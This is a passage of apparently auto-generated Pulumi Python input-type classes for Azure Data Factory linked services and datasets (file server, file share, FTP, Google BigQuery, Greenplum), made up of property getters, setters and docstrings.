pulumi.set(__self__, "type", 'FileServer')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter
def host(self) -> Any:
"""
Host name of the server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to logon the server.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[Any]:
"""
User ID to logon the server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[Any]):
pulumi.set(self, "user_id", value)
@pulumi.input_type
class FileShareDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
file_filter: Optional[Any] = None,
file_name: Optional[Any] = None,
folder_path: Optional[Any] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
An on-premises file system dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used for the file system.
:param pulumi.Input[str] description: Dataset description.
:param Any file_filter: Specify a filter to be used to select a subset of files in the folderPath rather than all files. Type: string (or Expression with resultType string).
:param Any file_name: The name of the on-premises file system. Type: string (or Expression with resultType string).
:param Any folder_path: The path of the on-premises file system. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of the files.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'FileShare')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if file_filter is not None:
pulumi.set(__self__, "file_filter", file_filter)
if file_name is not None:
pulumi.set(__self__, "file_name", file_name)
if folder_path is not None:
pulumi.set(__self__, "folder_path", folder_path)
if format is not None:
pulumi.set(__self__, "format", format)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used for the file system.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="fileFilter")
def file_filter(self) -> Optional[Any]:
"""
Specify a filter to be used to select a subset of files in the folderPath rather than all files. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "file_filter")
@file_filter.setter
def file_filter(self, value: Optional[Any]):
pulumi.set(self, "file_filter", value)
@property
@pulumi.getter(name="fileName")
def file_name(self) -> Optional[Any]:
"""
The name of the on-premises file system. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "file_name")
@file_name.setter
def file_name(self, value: Optional[Any]):
pulumi.set(self, "file_name", value)
@property
@pulumi.getter(name="folderPath")
def folder_path(self) -> Optional[Any]:
"""
The path of the on-premises file system. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "folder_path")
@folder_path.setter
def folder_path(self, value: Optional[Any]):
pulumi.set(self, "folder_path", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of the files.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class FtpServerLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_server_certificate_validation: Optional[Any] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
user_name: Optional[Any] = None):
"""
A FTP server Linked Service.
:param Any host: Host name of the FTP server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the FTP server.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_server_certificate_validation: If true, validate the FTP server SSL certificate when connect over SSL/TLS channel. Default value is true. Type: boolean (or Expression with resultType boolean).
:param Any enable_ssl: If true, connect to the FTP server over SSL/TLS channel. Default value is true. Type: boolean (or Expression with resultType boolean).
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to logon the FTP server.
:param Any port: The TCP port number that the FTP server uses to listen for client connections. Default value is 21. Type: integer (or Expression with resultType integer), minimum: 0.
:param Any user_name: Username to logon the FTP server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'FtpServer')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_server_certificate_validation is not None:
pulumi.set(__self__, "enable_server_certificate_validation", enable_server_certificate_validation)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def host(self) -> Any:
"""
Host name of the FTP server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the FTP server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableServerCertificateValidation")
def enable_server_certificate_validation(self) -> Optional[Any]:
"""
If true, validate the FTP server SSL certificate when connect over SSL/TLS channel. Default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "enable_server_certificate_validation")
@enable_server_certificate_validation.setter
def enable_server_certificate_validation(self, value: Optional[Any]):
pulumi.set(self, "enable_server_certificate_validation", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
If true, connect to the FTP server over SSL/TLS channel. Default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to logon the FTP server.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port number that the FTP server uses to listen for client connections. Default value is 21. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
Username to logon the FTP server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class GoogleBigQueryLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
project: Any,
type: pulumi.Input[str],
additional_projects: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_id: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
email: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
key_file_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
refresh_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
request_google_drive_scope: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None):
"""
Google BigQuery service linked service.
:param pulumi.Input[str] authentication_type: The OAuth 2.0 authentication mechanism used for authentication. ServiceAuthentication can only be used on self-hosted IR.
:param Any project: The default BigQuery project to query against.
:param pulumi.Input[str] type: Type of linked service.
:param Any additional_projects: A comma-separated list of public BigQuery projects to access.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_id: The client id of the google application used to acquire the refresh token.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret of the google application used to acquire the refresh token.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any email: The service account email ID that is used for ServiceAuthentication and can only be used on self-hosted IR.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any key_file_path: The full path to the .p12 key file that is used to authenticate the service account email address and can only be used on self-hosted IR.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] refresh_token: The refresh token obtained from Google for authorizing access to BigQuery for UserAuthentication.
:param Any request_google_drive_scope: Whether to request access to Google Drive. Allowing Google Drive access enables support for federated tables that combine BigQuery data with data from Google Drive. The default value is false.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "project", project)
pulumi.set(__self__, "type", 'GoogleBigQuery')
if additional_projects is not None:
pulumi.set(__self__, "additional_projects", additional_projects)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_id is not None:
pulumi.set(__self__, "client_id", client_id)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if email is not None:
pulumi.set(__self__, "email", email)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if key_file_path is not None:
pulumi.set(__self__, "key_file_path", key_file_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if refresh_token is not None:
pulumi.set(__self__, "refresh_token", refresh_token)
if request_google_drive_scope is not None:
pulumi.set(__self__, "request_google_drive_scope", request_google_drive_scope)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The OAuth 2.0 authentication mechanism used for authentication. ServiceAuthentication can only be used on self-hosted IR.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def project(self) -> Any:
"""
The default BigQuery project to query against.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Any):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="additionalProjects")
def additional_projects(self) -> Optional[Any]:
"""
A comma-separated list of public BigQuery projects to access.
"""
return pulumi.get(self, "additional_projects")
@additional_projects.setter
def additional_projects(self, value: Optional[Any]):
pulumi.set(self, "additional_projects", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client id of the google application used to acquire the refresh token.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret of the google application used to acquire the refresh token.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def email(self) -> Optional[Any]:
"""
The service account email ID that is used for ServiceAuthentication and can only be used on self-hosted IR.
"""
return pulumi.get(self, "email")
@email.setter
def email(self, value: Optional[Any]):
pulumi.set(self, "email", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="keyFilePath")
def key_file_path(self) -> Optional[Any]:
"""
The full path to the .p12 key file that is used to authenticate the service account email address and can only be used on self-hosted IR.
"""
return pulumi.get(self, "key_file_path")
@key_file_path.setter
def key_file_path(self, value: Optional[Any]):
pulumi.set(self, "key_file_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="refreshToken")
def refresh_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The refresh token obtained from Google for authorizing access to BigQuery for UserAuthentication.
"""
return pulumi.get(self, "refresh_token")
@refresh_token.setter
def refresh_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "refresh_token", value)
@property
@pulumi.getter(name="requestGoogleDriveScope")
def request_google_drive_scope(self) -> Optional[Any]:
"""
Whether to request access to Google Drive. Allowing Google Drive access enables support for federated tables that combine BigQuery data with data from Google Drive. The default value is false.
"""
return pulumi.get(self, "request_google_drive_scope")
@request_google_drive_scope.setter
def request_google_drive_scope(self, value: Optional[Any]):
pulumi.set(self, "request_google_drive_scope", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@pulumi.input_type
class GoogleBigQueryObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Google BigQuery service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'GoogleBigQueryObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class GreenplumLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Greenplum Database linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Greenplum')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
